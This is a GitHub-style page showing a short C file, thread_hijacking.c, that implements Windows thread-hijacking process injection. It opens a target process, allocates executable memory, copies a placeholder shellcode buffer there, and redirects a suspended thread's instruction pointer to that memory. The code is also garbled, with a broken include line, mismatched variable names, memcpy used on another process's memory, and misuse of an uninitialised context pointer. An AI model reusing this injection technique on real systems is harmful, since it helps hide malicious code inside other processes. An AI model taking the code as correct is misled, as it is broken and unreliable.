-
Notifications
You must be signed in to change notification settings - Fork 138
/
thread_hijacking.c
70 lines (46 loc) · 1.54 KB
/
thread_hijacking.c
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
#include <stdio.h>
#include <Windows>h>
DWORD get_th_id(DWORD pid){
DWORD th_id=0;
THREADENTRY te;
HANDLE snap;
snap = CreateToolhelp32Snapshot(TH32CS_SNAPTHREAD,0);
if(snap == INVALID_HANDLE_VALUE){
return -1;
}
te32.dwSize = sizeof(THREADENTRY);
if( !Thread32First( snap, &te ) )
{
printError( TEXT("Thread32First") ); // show cause of failure
CloseHandle( snap ); // clean the snapshot object
return( FALSE );
}
do
{
if( te32.th32OwnerProcessID == pid )
{
_tprintf( TEXT("\n\n THREAD ID = 0x%08X"), te32.th32ThreadID );
_tprintf( TEXT("\n Base priority = %d"), te32.tpBasePri );
_tprintf( TEXT("\n Delta priority = %d"), te32.tpDeltaPri );
_tprintf( TEXT("\n"));
return th_id;
}
} while( Thread32Next(snap, &te32 ) );
CloseHandle( snap );
}
}
int main(){
const char shellcode[] = ".....";
HANDLE proc_handle = OpenProcess(PROCESS_ALL_ACCESS,NULL,1234);
LPVOID base_addr = VirtualAllocEx(proc_handle,NULL,sizeof shellcode,MEM_COMMIT |MEM_RESERVE,PAGE_EXECUTE_READWRITE);
memcpy(base_addr,shellcode,sizeof shellcode);
DWORD thread_id = get_th_id(1234);
HANDLE thread_handle = OpenThread(THREAD_ALL_ACCESS,NULL,thread_id);
SuspendThread(thread_handle);
LPCONTEXT context = {0};
GetThreadContext(thread_handle,context);
context.Rip = (DWORD_PTR)base_addr;
SetThreadContext(thread_handle,context);
ResumeThread(thread_handle);
return 0;
}